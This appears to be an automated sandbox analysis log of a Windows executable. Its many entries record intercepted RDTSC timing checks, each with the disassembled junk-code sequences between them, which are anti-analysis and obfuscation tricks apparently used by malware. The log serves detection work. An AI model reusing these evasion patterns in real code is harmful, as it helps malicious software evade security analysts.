Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14EBDB2 second address: 14EBDC6 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F04A523AA86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007F04A523AA86h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14EC205 second address: 14EC20B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14EC20B second address: 14EC218 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007F04A523AA8Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14EC35F second address: 14EC364 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14EC364 second address: 14EC394 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F04A523AA90h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F04A523AA93h 0x00000011 jc 00007F04A523AA86h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14EC505 second address: 14EC50B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14EC50B second address: 14EC539 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 je 00007F04A523AA86h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edi 0x0000000e pushad 0x0000000f popad 0x00000010 pop edi 0x00000011 pushad 0x00000012 jmp 00007F04A523AA98h 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14EC689 second address: 14EC6BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F04A523FCB6h 0x0000000a jno 00007F04A523FCB6h 0x00000010 popad 0x00000011 pop edi 0x00000012 pushad 0x00000013 jmp 00007F04A523FCC9h 0x00000018 push ecx 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14EC6BA second address: 14EC6C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14EC7EB second address: 14EC7EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14F5266 second address: 14F5275 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14F5275 second address: 14F5286 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F04A523FCBDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14F4E2B second address: 14F4E2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14F4E2F second address: 14F4E35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 15026DB second address: 15026F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F04A523AA93h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 15026F4 second address: 1502701 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jns 00007F04A523FCB8h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1502701 second address: 1502721 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F04A523AA99h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1502721 second address: 1502733 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a je 00007F04A523FCB6h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 15028C2 second address: 15028D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jc 00007F04A523AA86h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 150F130 second address: 150F152 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F04A523FCC6h 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1510BC3 second address: 1510BC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1510BC7 second address: 1510BCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1510BCD second address: 1510BD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1510BD3 second address: 1510BF8 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F04A523FCCEh 0x00000008 pushad 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1519826 second address: 151982D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 151982D second address: 151983D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F04A523FCB6h 0x0000000a popad 0x0000000b push ebx 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 15196E2 second address: 15196E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 151CA09 second address: 151CA0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 151CA0D second address: 151CA24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F04A523AA8Dh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 151CA24 second address: 151CA28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 151CA28 second address: 151CA2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 151CA2E second address: 151CA72 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F04A523FCC8h 0x00000008 jne 00007F04A523FCB6h 0x0000000e pop esi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 pushad 0x00000013 jmp 00007F04A523FCC0h 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b pushad 0x0000001c push edi 0x0000001d pop edi 0x0000001e push eax 0x0000001f pop eax 0x00000020 pushad 0x00000021 popad 0x00000022 popad 0x00000023 push esi 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 152301B second address: 152301F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 152301F second address: 1523041 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523FCC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push edi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 152317B second address: 152319A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F04A523AA93h 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1523600 second address: 1523604 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1523604 second address: 152360A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 152360A second address: 1523633 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop eax 0x0000000a jbe 00007F04A523FCB8h 0x00000010 popad 0x00000011 push esi 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F04A523FCC1h 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1523633 second address: 1523637 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1523637 second address: 152363D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 152379F second address: 15237B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 ja 00007F04A523AA8Ch 0x0000000b jbe 00007F04A523AA86h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 15237B0 second address: 15237B5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 152392A second address: 1523947 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F04A523AA88h 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F04A523AA8Fh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1523B0F second address: 1523B19 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F04A523FCB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1523B19 second address: 1523B1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1523B1F second address: 1523B25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1523B25 second address: 1523B2F instructions: 0x00000000 rdtsc 0x00000002 jns 00007F04A523AA86h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1523B2F second address: 1523B49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F04A523FCBAh 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 pop edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1523B49 second address: 1523B4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1523B4F second address: 1523B55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1528085 second address: 15280A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F04A523AA95h 0x00000009 pop edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 15280A2 second address: 15280D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F04A523FCC9h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push edi 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 pop eax 0x0000001a pop edi 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 15280D5 second address: 15280EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523AA8Bh 0x00000007 ja 00007F04A523AA86h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1527C8D second address: 1527C96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1527E06 second address: 1527E0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1527E0B second address: 1527E18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F04A523FCB6h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 152D13B second address: 152D145 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F04A523AA8Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7950E1B second address: 7950E6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edi 0x00000008 jmp 00007F04A523FCC3h 0x0000000d test eax, eax 0x0000000f jmp 00007F04A523FCC6h 0x00000014 jne 00007F0514DCE544h 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F04A523FCC7h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7950E6D second address: 7950EA9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523AA99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F04A523AA98h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7950EA9 second address: 7950EAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7950EAD second address: 7950EB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7950EB3 second address: 7950EC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F04A523FCBDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7950EC4 second address: 7950EC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7950EC8 second address: 7950F5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi] 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F04A523FCBFh 0x00000011 sub eax, 2FCA5D4Eh 0x00000017 jmp 00007F04A523FCC9h 0x0000001c popfd 0x0000001d popad 0x0000001e mov dword ptr [edx], eax 0x00000020 jmp 00007F04A523FCBEh 0x00000025 mov eax, dword ptr [esi+04h] 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007F04A523FCBEh 0x0000002f sbb ecx, 03D81CF8h 0x00000035 jmp 00007F04A523FCBBh 0x0000003a popfd 0x0000003b jmp 00007F04A523FCC8h 0x00000040 popad 0x00000041 mov dword ptr [edx+04h], eax 0x00000044 pushad 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 pop edi 0x00000049 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 795102D second address: 7951033 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7951033 second address: 7951037 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7951037 second address: 79510C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+14h] 0x0000000b pushad 0x0000000c jmp 00007F04A523AA96h 0x00000011 pushfd 0x00000012 jmp 00007F04A523AA92h 0x00000017 sub ax, 8728h 0x0000001c jmp 00007F04A523AA8Bh 0x00000021 popfd 0x00000022 popad 0x00000023 mov dword ptr [edx+14h], eax 0x00000026 jmp 00007F04A523AA96h 0x0000002b mov eax, dword ptr [esi+18h] 0x0000002e pushad 0x0000002f pushfd 0x00000030 jmp 00007F04A523AA8Eh 0x00000035 sbb eax, 600894B8h 0x0000003b jmp 00007F04A523AA8Bh 0x00000040 popfd 0x00000041 push eax 0x00000042 push edx 0x00000043 mov bx, ax 0x00000046 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 79510C1 second address: 7951109 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F04A523FCC2h 0x00000008 jmp 00007F04A523FCC5h 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 mov dword ptr [edx+18h], eax 0x00000014 jmp 00007F04A523FCBEh 0x00000019 mov eax, dword ptr [esi+1Ch] 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7951109 second address: 795110F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 795110F second address: 795116C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523FCC4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+1Ch], eax 0x0000000c jmp 00007F04A523FCC0h 0x00000011 mov eax, dword ptr [esi+20h] 0x00000014 jmp 00007F04A523FCC0h 0x00000019 mov dword ptr [edx+20h], eax 0x0000001c jmp 00007F04A523FCC0h 0x00000021 mov eax, dword ptr [esi+24h] 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 mov eax, edx 0x00000029 mov cx, di 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 795116C second address: 7951268 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523AA92h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+24h], eax 0x0000000c pushad 0x0000000d call 00007F04A523AA8Eh 0x00000012 pushfd 0x00000013 jmp 00007F04A523AA92h 0x00000018 or esi, 4F265A28h 0x0000001e jmp 00007F04A523AA8Bh 0x00000023 popfd 0x00000024 pop ecx 0x00000025 call 00007F04A523AA99h 0x0000002a jmp 00007F04A523AA90h 0x0000002f pop eax 0x00000030 popad 0x00000031 mov eax, dword ptr [esi+28h] 0x00000034 jmp 00007F04A523AA91h 0x00000039 mov dword ptr [edx+28h], eax 0x0000003c pushad 0x0000003d pushfd 0x0000003e jmp 00007F04A523AA8Ch 0x00000043 add cl, 00000018h 0x00000046 jmp 00007F04A523AA8Bh 0x0000004b popfd 0x0000004c mov di, ax 0x0000004f popad 0x00000050 mov ecx, dword ptr [esi+2Ch] 0x00000053 jmp 00007F04A523AA92h 0x00000058 mov dword ptr [edx+2Ch], ecx 0x0000005b pushad 0x0000005c movzx eax, bx 0x0000005f jmp 00007F04A523AA93h 0x00000064 popad 0x00000065 mov ax, word ptr [esi+30h] 0x00000069 push eax 0x0000006a push edx 0x0000006b jmp 00007F04A523AA95h 0x00000070 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7951268 second address: 79512AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F04A523FCC7h 0x00000008 jmp 00007F04A523FCC8h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov word ptr [edx+30h], ax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F04A523FCBAh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 79512AF second address: 79512BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523AA8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 79512BE second address: 79512E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523FCC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ax, word ptr [esi+32h] 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 79512E5 second address: 79512E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 79512E9 second address: 79512EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 79512EF second address: 7951333 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523AA92h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov word ptr [edx+32h], ax 0x0000000d pushad 0x0000000e mov edi, esi 0x00000010 jmp 00007F04A523AA8Ah 0x00000015 popad 0x00000016 mov eax, dword ptr [esi+34h] 0x00000019 jmp 00007F04A523AA90h 0x0000001e mov dword ptr [edx+34h], eax 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7951333 second address: 7951337 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7951337 second address: 795133D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 795133D second address: 7951369 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523FCC4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test ecx, 00000700h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F04A523FCBAh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7951369 second address: 795136D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 795136D second address: 7951373 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
